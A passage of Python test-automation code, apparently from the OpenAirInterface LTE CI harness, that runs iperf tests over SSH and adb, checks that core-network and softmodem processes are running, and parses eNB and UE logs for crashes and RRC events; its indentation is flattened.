self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps" | grep --color=never iperf | grep -v grep\'', '\$', 60)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
if self.ADBCentralized:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
else:
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
self.close()
# if the client report is absent, try to analyze the server log file
if (clientStatus == -1):
time.sleep(1)
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '_' + device_id + '.log')
if (device_id == 'OAI-UE'):
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
else:
self.copyin(self.ADBIPAddress, self.ADBUserName, self.ADBPassword, self.EPCSourceCodePath + '/scripts/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.Iperf_analyzeV2Server(lock, UE_IPAddress, device_id, statusQueue, modified_options)
# in case of OAI UE:
if (device_id == 'OAI-UE'):
if (os.path.isfile('iperf_server_' + self.testCase_id + '_' + device_id + '.log')):
if not launchFromEpc:
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
else:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/iperf_server_' + self.testCase_id + '_' + device_id + '.log', '.')
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_' + device_id + '.log', self.EPCSourceCodePath + '/scripts')
except:
os.kill(os.getppid(),signal.SIGUSR1)
def IperfNoS1(self):
if self.eNBIPAddress == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = True
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
server_on_enb = re.search('-R', str(self.iperf_args))
if server_on_enb is not None:
iServerIPAddr = self.eNBIPAddress
iServerUser = self.eNBUserName
iServerPasswd = self.eNBPassword
iClientIPAddr = self.UEIPAddress
iClientUser = self.UEUserName
iClientPasswd = self.UEPassword
else:
iServerIPAddr = self.UEIPAddress
iServerUser = self.UEUserName
iServerPasswd = self.UEPassword
iClientIPAddr = self.eNBIPAddress
iClientUser = self.eNBUserName
iClientPasswd = self.eNBPassword
if self.iperf_options != 'sink':
# Starting the iperf server
self.open(iServerIPAddr, iServerUser, iServerPasswd)
# args SHALL be "-c client -u any"
# -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
# -B 10.0.1.1 -u -s -i 1 -fm
server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
server_options = server_options.replace('-c','-B')
self.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
self.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
time.sleep(0.5)
self.close()
# Starting the iperf client
modified_options = self.Iperf_ComputeModifiedBW(0, 1)
modified_options = modified_options.replace('-R','')
iperf_time = self.Iperf_ComputeTime()
self.open(iClientIPAddr, iClientUser, iClientPasswd)
self.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
iperf_status = self.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
status_queue = SimpleQueue()
lock = Lock()
if iperf_status < 0:
message = 'iperf on OAI UE crashed due to TIMEOUT !'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
clientStatus = -2
else:
if self.iperf_options == 'sink':
clientStatus = 0
status_queue.put(0)
status_queue.put('OAI-UE')
status_queue.put('10.0.1.2')
status_queue.put('Sink Test : no check')
else:
clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
self.close()
# Stopping the iperf server
if self.iperf_options != 'sink':
self.open(iServerIPAddr, iServerUser, iServerPasswd)
self.command('killall --signal SIGKILL iperf', '\$', 5)
time.sleep(0.5)
self.close()
if (clientStatus == -1):
if (os.path.isfile('iperf_server_' + self.testCase_id + '.log')):
os.remove('iperf_server_' + self.testCase_id + '.log')
self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
# copying on the EPC server for logCollection
if (clientStatus == -1):
copyin_res = self.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
copyin_res = self.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
if (copyin_res == 0):
self.copyout(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, 'iperf_' + self.testCase_id + '_OAI-UE.log', self.EPCSourceCodePath + '/scripts')
iperf_noperf = False
if status_queue.empty():
iperf_status = False
else:
iperf_status = True
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def Iperf(self):
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is not None:
self.IperfNoS1()
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
check_OAI_UE = True
else:
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ueIpStatus = self.GetAllUEIPAddresses()
if (ueIpStatus < 0):
self.CreateHtmlTestRow(self.iperf_args, 'KO', UE_IP_ADDRESS_ISSUE)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
i = 0
ue_num = len(self.UEIPAddresses)
lock = Lock()
status_queue = SimpleQueue()
for UE_IPAddress in self.UEIPAddresses:
device_id = self.UEDevices[i]
p = Process(target = SSH.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
i = i + 1
for job in multi_jobs:
job.join()
if (status_queue.empty()):
self.CreateHtmlTestRow(self.iperf_args, 'KO', ALL_PROCESSES_OK)
self.AutoTerminateUEandeNB()
else:
iperf_status = True
iperf_noperf = False
html_queue = SimpleQueue()
while (not status_queue.empty()):
count = status_queue.get()
if (count < 0):
iperf_status = False
if (count > 0):
iperf_noperf = True
device_id = status_queue.get()
ip_addr = status_queue.get()
message = status_queue.get()
html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
html_queue.put(html_cell)
if (iperf_noperf and iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
elif (iperf_status):
self.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
self.AutoTerminateUEandeNB()
def CheckProcessExist(self, check_eNB, check_OAI_UE):
multi_jobs = []
status_queue = SimpleQueue()
# in noS1 config, no need to check status from EPC
result = re.search('noS1', str(self.Initialize_eNB_args))
if result is None:
p = Process(target = SSH.CheckHSSProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckMMEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
p = Process(target = SSH.CheckSPGWProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
else:
if (check_eNB == False) and (check_OAI_UE == False):
return 0
if check_eNB:
p = Process(target = SSH.CheckeNBProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
if check_OAI_UE:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == ENB_PROCESS_FAILED:
fileCheck = re.search('enb_', str(self.eNBLogFiles[0]))
if fileCheck is not None:
self.copyin(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, self.eNBSourceCodePath + '/cmake_targets/' + self.eNBLogFiles[0], '.')
logStatus = self.AnalyzeLogFile_eNB(self.eNBLogFiles[0])
if logStatus < 0:
result = logStatus
self.eNBLogFiles[0] = ''
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.TerminateFlexranCtrl()
return result
def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
multi_jobs = []
status_queue = SimpleQueue()
if initialize_OAI_UE_flag == False:
p = Process(target = SSH.CheckOAIUEProcess, args = (status_queue,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
if (status_queue.empty()):
return -15
else:
result = 0
while (not status_queue.empty()):
status = status_queue.get()
if (status < 0):
result = status
if result == OAI_UE_PROCESS_FAILED:
fileCheck = re.search('ue_', str(self.UELogFile))
if fileCheck is not None:
self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
if logStatus < 0:
result = logStatus
return result
def CheckOAIUEProcess(self, status_queue):
try:
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
status_queue.put(OAI_UE_PROCESS_FAILED)
else:
status_queue.put(OAI_UE_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckeNBProcess(self, status_queue):
try:
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is None:
logging.debug('\u001B[1;37;41m eNB Process Not Found! \u001B[0m')
status_queue.put(ENB_PROCESS_FAILED)
else:
status_queue.put(ENB_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckHSSProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never hss | grep -v grep', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
result = re.search('oai_hss -j', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
result = re.search('hss_sim s6as diam_hss', str(self.ssh.before))
else:
logging.error('This should not happen!')
if result is None:
logging.debug('\u001B[1;37;41m HSS Process Not Found! \u001B[0m')
status_queue.put(HSS_PROCESS_FAILED)
else:
status_queue.put(HSS_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckMMEProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('stdbuf -o0 ps -aux | grep --color=never mme | grep -v grep', '\$', 5)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
result = re.search('mme -c', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
result = re.search('mme', str(self.ssh.before))
else:
logging.error('This should not happen!')
if result is None:
logging.debug('\u001B[1;37;41m MME Process Not Found! \u001B[0m')
status_queue.put(MME_PROCESS_FAILED)
else:
status_queue.put(MME_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def CheckSPGWProcess(self, status_queue):
try:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI-Rel14-CUPS', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('spgwu -c ', str(self.ssh.before))
elif re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
elif re.match('ltebox', self.EPCType, re.IGNORECASE):
self.command('stdbuf -o0 ps -aux | grep --color=never xGw | grep -v grep', '\$', 5)
result = re.search('xGw', str(self.ssh.before))
else:
logging.error('This should not happen!')
if result is None:
logging.debug('\u001B[1;37;41m SPGW Process Not Found! \u001B[0m')
status_queue.put(SPGW_PROCESS_FAILED)
else:
status_queue.put(SPGW_PROCESS_OK)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_eNB(self, eNBlogFile):
if (not os.path.isfile('./' + eNBlogFile)):
return -1
enb_log_file = open('./' + eNBlogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
rrcSetupComplete = 0
rrcReleaseRequest = 0
rrcReconfigRequest = 0
rrcReconfigComplete = 0
rrcReestablishRequest = 0
rrcReestablishComplete = 0
rrcReestablishReject = 0
rlcDiscardBuffer = 0
rachCanceledProcedure = 0
uciStatMsgCount = 0
pdcpFailure = 0
ulschFailure = 0
cdrxActivationMessageCount = 0
dropNotEnoughRBs = 0
mbmsRequestMsg = 0
self.htmleNBFailureMsg = ''
isRRU = False
isSlave = False
slaveReceivesFrameResyncCmd = False
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures = 0
X2HO_outNbProcedures = 0
for line in enb_log_file.readlines():
if X2HO_state == X2_HO_REQ_STATE__IDLE:
result = re.search('target eNB Receives X2 HO Req X2AP_HANDOVER_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RECEIVES_REQ
result = re.search('source eNB receives the X2 HO ACK X2AP_HANDOVER_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK
if X2HO_state == X2_HO_REQ_STATE__TARGET_RECEIVES_REQ:
result = re.search('Received LTE_RRCConnectionReconfigurationComplete from UE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE
if X2HO_state == X2_HO_REQ_STATE__TARGET_RRC_RECFG_COMPLETE:
result = re.search('issue rrc_eNB_send_PATH_SWITCH_REQ', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ
if X2HO_state == X2_HO_REQ_STATE__TARGET_SENDS_SWITCH_REQ:
result = re.search('received path switch ack S1AP_PATH_SWITCH_REQ_ACK', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_inNbProcedures += 1
if X2HO_state == X2_HO_REQ_STATE__SOURCE_RECEIVES_REQ_ACK:
result = re.search('source eNB receives the X2 UE CONTEXT RELEASE X2AP_UE_CONTEXT_RELEASE', str(line))
if result is not None:
X2HO_state = X2_HO_REQ_STATE__IDLE
X2HO_outNbProcedures += 1
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('max_rxgain (?P<requested_option>[0-9]+)', self.eNBOptions[int(self.eNB_instance)])
res2 = re.search('max_rxgain (?P<applied_option>[0-9]+)', str(line))
if res1 is not None and res2 is not None:
requested_option = int(res1.group('requested_option'))
applied_option = int(res2.group('applied_option'))
if requested_option == applied_option:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ok-circle"></span> Command line option(s) correctly applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
else:
self.htmleNBFailureMsg += '<span class="glyphicon glyphicon-ban-circle"></span> Command line option(s) NOT applied <span class="glyphicon glyphicon-arrow-right"></span> ' + self.eNBOptions[int(self.eNB_instance)] + '\n\n'
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('[Ss]egmentation [Ff]ault', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte_build_oai/build/lte-softmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('Setting function for RU', str(line))
if result is not None:
isRRU = True
if isRRU:
result = re.search('RU 0 is_slave=yes', str(line))
if result is not None:
isSlave = True
if isSlave:
result = re.search('Received RRU_frame_resynch command', str(line))
if result is not None:
slaveReceivesFrameResyncCmd = True
result = re.search('LTE_RRCConnectionSetupComplete from UE', str(line))
if result is not None:
rrcSetupComplete += 1
result = re.search('Generate LTE_RRCConnectionRelease|Generate RRCConnectionRelease', str(line))
if result is not None:
rrcReleaseRequest += 1
result = re.search('Generate LTE_RRCConnectionReconfiguration', str(line))
if result is not None:
rrcReconfigRequest += 1
result = re.search('LTE_RRCConnectionReconfigurationComplete from UE rnti', str(line))
if result is not None:
rrcReconfigComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentRequest', str(line))
if result is not None:
rrcReestablishRequest += 1
result = re.search('LTE_RRCConnectionReestablishmentComplete', str(line))
if result is not None:
rrcReestablishComplete += 1
result = re.search('LTE_RRCConnectionReestablishmentReject', str(line))
if result is not None:
rrcReestablishReject += 1
result = re.search('CDRX configuration activated after RRC Connection', str(line))
if result is not None:
cdrxActivationMessageCount += 1
result = re.search('uci->stat', str(line))
if result is not None:
uciStatMsgCount += 1
result = re.search('PDCP.*Out of Resources.*reason', str(line))
if result is not None:
pdcpFailure += 1
result = re.search('ULSCH in error in round', str(line))
if result is not None:
ulschFailure += 1
result = re.search('BAD all_segments_received', str(line))
if result is not None:
rlcDiscardBuffer += 1
result = re.search('Canceled RA procedure for UE rnti', str(line))
if result is not None:
rachCanceledProcedure += 1
result = re.search('dropping, not enough RBs', str(line))
if result is not None:
dropNotEnoughRBs += 1
if self.eNBmbmsEnables[int(self.eNB_instance)]:
result = re.search('MBMS USER-PLANE.*Requesting.*bytes from RLC', str(line))
if result is not None:
mbmsRequestMsg += 1
enb_log_file.close()
logging.debug(' File analysis completed')
if uciStatMsgCount > 0:
statMsg = 'eNB showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if pdcpFailure > 0:
statMsg = 'eNB showed ' + str(pdcpFailure) + ' "PDCP Out of Resources" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if ulschFailure > 0:
statMsg = 'eNB showed ' + str(ulschFailure) + ' "ULSCH in error in round" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if dropNotEnoughRBs > 0:
statMsg = 'eNB showed ' + str(dropNotEnoughRBs) + ' "dropping, not enough RBs" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
self.htmleNBFailureMsg += statMsg + '\n'
if rrcSetupComplete > 0:
rrcMsg = 'eNB completed ' + str(rrcSetupComplete) + ' RRC Connection Setup(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReleaseRequest > 0:
rrcMsg = 'eNB requested ' + str(rrcReleaseRequest) + ' RRC Connection Release(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReconfigRequest > 0 or rrcReconfigComplete > 0:
rrcMsg = 'eNB requested ' + str(rrcReconfigRequest) + ' RRC Connection Reconfiguration(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReconfigComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rrcReestablishRequest > 0 or rrcReestablishComplete > 0 or rrcReestablishReject > 0:
rrcMsg = 'eNB requested ' + str(rrcReestablishRequest) + ' RRC Connection Reestablishment(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishComplete) + ' were completed'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
rrcMsg = ' -- ' + str(rrcReestablishReject) + ' were rejected'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBmbmsEnables[int(self.eNB_instance)]:
if mbmsRequestMsg > 0:
rrcMsg = 'eNB requested ' + str(mbmsRequestMsg) + ' times the RLC for MBMS USER-PLANE'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_inNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_inNbProcedures) + ' X2 Handover Connection procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if X2HO_outNbProcedures > 0:
rrcMsg = 'eNB completed ' + str(X2HO_outNbProcedures) + ' X2 Handover Release procedure(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if self.eNBOptions[int(self.eNB_instance)] != '':
res1 = re.search('drx_Config_present prSetup', self.eNBOptions[int(self.eNB_instance)])
if res1 is not None:
if cdrxActivationMessageCount > 0:
rrcMsg = 'eNB activated the CDRX Configuration for ' + str(cdrxActivationMessageCount) + ' time(s)'
logging.debug('\u001B[1;30;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
else:
rrcMsg = 'eNB did NOT ACTIVATE the CDRX Configuration'
logging.debug('\u001B[1;37;43m ' + rrcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rrcMsg + '\n'
if rachCanceledProcedure > 0:
rachMsg = 'eNB cancelled ' + str(rachCanceledProcedure) + ' RA procedure(s)'
logging.debug('\u001B[1;30;43m ' + rachMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rachMsg + '\n'
if isRRU:
if isSlave:
if slaveReceivesFrameResyncCmd:
rruMsg = 'Slave RRU received the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;30;43m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
else:
rruMsg = 'Slave RRU DID NOT receive the RRU_frame_resynch command from RAU'
logging.debug('\u001B[1;37;41m ' + rruMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rruMsg + '\n'
self.prematureExit = True
return ENB_PROCESS_SLAVE_RRU_NOT_SYNCED
if foundSegFault:
logging.debug('\u001B[1;37;41m eNB ended with a Segmentation Fault! \u001B[0m')
return ENB_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;37;41m eNB ended with an assertion! \u001B[0m')
self.htmleNBFailureMsg += msgAssertion
return ENB_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m eNB faced real time issues! \u001B[0m')
self.htmleNBFailureMsg += 'eNB faced real time issues!\n'
#return ENB_PROCESS_REALTIME_ISSUE
if rlcDiscardBuffer > 0:
rlcMsg = 'eNB RLC discarded ' + str(rlcDiscardBuffer) + ' buffer(s)'
logging.debug('\u001B[1;37;41m ' + rlcMsg + ' \u001B[0m')
self.htmleNBFailureMsg += rlcMsg + '\n'
return ENB_PROCESS_REALTIME_ISSUE
return 0
def AnalyzeLogFile_UE(self, UElogFile):
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
mbms_messages = 0
self.htmlUEFailureMsg = ''
for line in ue_log_file.readlines():
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1A', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
if self.eNBmbmsEnables[0]:
result = re.search('TRIED TO PUSH MBMS DATA', str(line))
if result is not None:
mbms_messages += 1
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
self.htmlUEFailureMsg += mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
self.htmlUEFailureMsg += mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
